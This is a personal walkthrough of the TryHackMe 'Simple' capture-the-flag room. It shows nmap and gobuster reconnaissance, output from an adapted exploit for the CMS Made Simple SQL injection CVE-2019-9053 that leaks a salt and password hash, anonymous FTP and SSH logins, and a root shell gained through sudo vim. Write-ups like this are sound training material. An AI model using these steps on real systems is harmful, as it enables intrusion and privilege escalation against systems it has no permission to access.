Try Hack Me - Simple

Beginner level ctf

This is a walkthrough of the "Simple" room on Try Hack Me. I won't be including the actual answers to the questions posed, but the details will all be in here somewhere if you need help.

1 & 2

How many services are running under port 1000?
What is running on the higher port?

Let's run nmap:

kali@kali:~$ sudo nmap -v -sV
Starting Nmap 7.80 ( ) at 2020-09-18 00:14 UTC                                                                                                                                                                            
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 00:14
Scanning [4 ports]
Completed Ping Scan at 00:14, 0.34s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:14
Completed Parallel DNS resolution of 1 host. at 00:14, 0.02s elapsed
Initiating SYN Stealth Scan at 00:14
Scanning [1000 ports]
Discovered open port 21/tcp on
Discovered open port 80/tcp on
Discovered open port 2222/tcp on
Completed SYN Stealth Scan at 00:14, 21.83s elapsed (1000 total ports)
Initiating Service scan at 00:14
Scanning 3 services on
Completed Service scan at 00:14, 6.85s elapsed (3 services on 1 host)
NSE: Script scanning
Initiating NSE at 00:14
Completed NSE at 00:14, 1.20s elapsed
Initiating NSE at 00:14
Completed NSE at 00:14, 2.28s elapsed
Nmap scan report for
Host is up (0.24s latency).
Not shown: 997 filtered ports
21/tcp   open  ftp     vsftpd 3.0.3
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 32.96 seconds
           Raw packets sent: 2011 (88.460KB) | Rcvd: 14 (600B)

3 & 4

What's the CVE you're using against the application?
To what kind of vulnerability is the application vulnerable?

Well we don't even know the "application" yet. Let's see what we can find on http for this target. Let's run gobuster to see what there is other than the default apache page.

kali@kali:~$ gobuster dir --url --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/09/17 23:35:33 Starting gobuster
/simple (Status: 301)

After poking around a little bit at what appears to be a CMS, one thing that stands out is a "news module" that looks to be installed. The page also let's us know the version of the software is 2.2.8.

Googling for "cms made simple news cve 2.2.8" let's us know it has a vulnerability to a "blind time-based SQL injection via the m1_idlist parameter" known as CVE-2019-9053

Find a suitable exploit script for the CVE that uses a time based SQLi to extract the salt, username, and password fields. I ended up needing to adjust the script a bit to account for variations in timing and then to deal with some Unicode encoding issues in my wordlists or something. I'm still learning Python. It gets the necessary information easily enough after that. I also adjusted the script to let me not start from scratch but instead input the salt and password I had found. That way when the script errored out on Unicode stuff, I could more quickly adjust it and retry.

[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: m
[+] Username found: mi
[+] Username found: mit
[+] Username found: mitc
[+] Username found: mitch
[+] Email found: admin@admin.comn
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96


What's the password?

[+] Password cracked: ******


Where can you login with the details obtained?
SSH is available on port 2222, so that seems like the most likely answer.


What's the user flag?

$ ls -l   
total 4
-rw-rw-r-- 1 mitch mitch 19 aug 17  2019 user.txt
$ cat user.txt  
**** ***, **** **!

Check on the open ftp port

kali@kali:~$ ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -l
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 17  2019 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -l
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           166 Aug 17  2019 ForMitch.txt
226 Directory send OK.
ftp> get ForMitch.txt
local: ForMitch.txt remote: ForMitch.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ForMitch.txt (166 bytes).
226 Transfer complete.
166 bytes received in 0.00 secs (93.9220 kB/s)
ftp> 221 Goodbye.
kali@kali:~$ cat ForMitch.txt 
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!

I didn't really need this helpful tip at this point, but it might have pointed out what needs to be done if I had checked it earlier.


Is there any other user in the home directory? What's its name?
Easy enough to go up and list directories under /home


What can you leverage to spawn a privileged shell?

Scan for privilege escalation with linpeas

It finds that this user can run vim as root. You can find this out with sudo -l as well. From there it's the last step, just go to command mode in vim and open a shell, we'll be root.


What's the root flag?

$ sudo vim

root@Machine:~# cd /root
root@Machine:/root# cat root.txt 
**** ****. *** **** **!